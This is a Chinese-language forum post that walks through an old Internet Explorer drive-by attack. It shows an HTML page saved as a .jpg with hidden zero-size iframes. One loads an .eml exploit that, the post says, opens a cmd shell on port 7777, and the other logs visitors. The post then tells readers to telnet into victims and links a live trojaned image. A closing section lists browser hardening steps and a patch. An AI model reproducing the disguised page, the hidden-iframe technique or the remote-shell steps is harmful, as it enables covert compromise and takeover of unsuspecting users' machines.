<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
<title>Test!</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<p><img src="ot2131.JPG" width="322" height="486"></p>
<iframe src="load.eml" width="0" height="0" frameborder="no" border="0"
marginwidth="0" marginheight="0" scrolling="no">
</iframe>
<iframe src="fangwen.htm" width="0" height="0" frameborder="no" border="0"
marginwidth="0" marginheight="0" scrolling="no">
</iframe>
</body>
</html>
上面這個頁面首先利用了IE的APP漏洞,它對含有 HTML 語句的文本不檢查擴展名。
在 NOTEPAD 上寫一份 HTML 文件,保存為 .jpg。上傳至空間服務器,用 IE 訪問
URL。發現,IE 把 .jpg 誤讀成 .html.
接下來我們用了兩個 iframe 分別調用頁面,
load.eml
fangwen.htm
顯示大小為 width="0" height="0" 所以在頁面中不顯示,
load.eml 是利用了ie的通過構造特殊代碼導致 IE 用戶執行攻擊者命令漏洞
當用戶訪問load.eml 時將被自動的起出端口 7777的cmd shell
+++++++++++++++++++++++++++++++++++++++++++++++++++++
fangwen.htm 是一個記數統計器,用於查看哪些人,在幾點,什麼ip訪問過。
=======================================================
ok , 現在你在命令行輸入 telnet 目標ip 7777 就可以知道結果了!
下面就是那個JPG圖像﹕
http://www.chinawolf.com/~vertarmy/1.jpg
沒裝防火牆請不要點擊 (有木馬!!!)
=======================================================
預防方法﹕
1.最好的辦法是不使用IE和Outlook。可以用Netscape代替IE,用Foxmail代替Outlook。如果非要用,建議你按下面的方法進行操作﹕
(1)運行IE,點擊“工具→Internet選項→安全→Internet區域的安全級別”,把安全極別由“中”改為“高”。
(2)接著,點擊“自定義級別”按鈕,在彈出的窗口中,禁用“對標記為可安全執行腳本的ActiveX控件執行腳本”選項。
(3)同理,在此窗口中禁用IE的“活動腳本”和“文件下載”功能。
(4)禁用所有的ActiveX控製和插件。
(5)設置資源管理器成“始終顯示擴展名”。
(6)禁止以WEB方式使用資源管理器。
(7)取消“下載後確認打開”這種擴展名屬性設置。
(8)永遠不直接從IE瀏覽器中選擇打開文件。
2.不要受陌生人的誘惑打開別人給你的RUL,如果確實想看,可以通過一些下載工具把頁面下載下來,然後用記事本等一些文本編輯工具打開查看代碼。
3.微軟公司為該漏洞提供了一個補丁,趕快到下面所列出的URL去看看吧﹕
http://www.microsoft.com/windows/ie/download/critical/
Q290108/default.asp
作者:54yuwei
 |
回覆時引用此文章
書籤